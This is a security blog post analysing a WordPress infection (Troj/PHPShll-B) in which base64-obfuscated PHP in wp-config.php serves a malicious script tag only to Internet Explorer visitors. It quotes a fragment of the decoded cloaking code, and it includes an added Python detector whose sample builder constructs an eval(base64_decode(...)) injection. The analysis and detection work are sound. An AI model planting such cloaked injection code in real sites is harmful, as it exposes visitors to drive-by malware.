Troj/PHPShll-B: Malware injects itself into WordPress installations


On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friend’s websites.

When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C.

So, I investigated a little more deeply – repeating the download after setting the User-Agent in my browser to pretend to be Internet Explorer.

This time I saw:

>>> Virus 'Mal/Badsrc-C' found in file index.html

Clearly, the malware on the website was planted in such a way that it would only manifest itself if it believed that the computer visiting the webpage was running Internet Explorer.

When you look at the last line of the index.html file you can see the appended malicious script tag:

[Screenshot: appended malicious script tag at the end of index.html]

As my colleague knew the affected website’s owner, I was able to gain a complete copy of the site which was running an installation of the popular WordPress blogging platform.

Looking at the WordPress configuration file (wp-config.php) I saw a suspicious piece of code prepended:

When this code is run it decodes to some suspicious code:

stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("PHNjcmlwdCBzcm...

The above code snippet means that the malicious code is only served when the User-Agent string contains "MSIE 6", "MSIE 7", "MSIE 8" or "MSIE 9", i.e. Internet Explorer 6 to 9. The geekier amongst you will recognise the base64 string as being the beginning of:

<script src

Sophos now detects and disinfects this modified code as Troj/PHPShll-B.
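A file-level check for the kind of base64-wrapped, User-Agent-cloaked wrapper described above, as an added Python example that is not from the post or from Sophos. The sample wp-config.php content, the "example.invalid" host and the helper names are constructed for the demonstration.

```python
import base64
import re

# Base64 blob handed to PHP's base64_decode(); 16+ chars skips trivial strings.
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]{16,})["\']\s*\)')
# The cloaking the post describes: a branch on HTTP_USER_AGENT containing "MSIE".
UA_CHECK = re.compile(r'HTTP_USER_AGENT.*?MSIE', re.S)
SCRIPT_SRC = re.compile(r'<script\s+src=["\']?([^"\'\s>]+)', re.I)

def decode_layers(blob, max_depth=5):
    """Decode a base64 blob, following nested base64_decode("...") calls it reveals."""
    layers, current = [], blob
    for _ in range(max_depth):
        try:
            decoded = base64.b64decode(current, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers.append(decoded)
        nested = B64_CALL.search(decoded)
        if not nested:
            break
        current = nested.group(1)
    return layers

def audit_php(source):
    """Report base64-wrapped code that cloaks on IE or injects a <script src>."""
    findings = []
    for m in B64_CALL.finditer(source):
        layers = decode_layers(m.group(1))
        text = "\n".join(layers)
        cloaked = UA_CHECK.search(text) is not None
        srcs = SCRIPT_SRC.findall(text)
        if cloaked or srcs:
            findings.append({"offset": m.start(), "depth": len(layers),
                             "cloaked_for_ie": cloaked, "script_src": srcs})
    return findings

def build_sample():
    """Constructed wp-config.php modelled on the post; example.invalid is a placeholder."""
    tag = b'<script src="http://example.invalid/x.js"></script>'
    inner = ('if(stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||'
             'stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("%s"); }'
             % base64.b64encode(tag).decode())
    wrapper = 'eval(base64_decode("%s"));' % base64.b64encode(inner.encode()).decode()
    return "<?php " + wrapper + "\n/** WordPress base configuration */\ndefine('DB_NAME', 'wp');\n"
```

Run audit_php() over the contents of each PHP file in the install; a finding with a small offset in wp-config.php matches the prepended placement seen here.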

So, what’s happened is that somehow malicious code has managed to inject itself into the PHP code used on some websites running WordPress, meaning that if you visit them when running Internet Explorer you could be exposing yourself to a malware attack.

What isn’t clear is exactly how the malicious code managed to embed itself on the website, although it was most probably via compromised FTP credentials.

If you run a site which uses WordPress you would be wise to ensure that your passwords are chosen carefully (not dictionary words, and not easy to guess) and that you are not using the same credentials on any other websites. If you think it’s possible that your password details may have been stolen – or if you use the same passwords elsewhere on the internet – change them immediately.

Furthermore, you should be regularly auditing the code on your site to ensure that there have not been any unauthorised changes.

Finally, always ensure that your website software is up-to-date and fully patched.

This hack appears to be widespread and website owners need to be vigilant.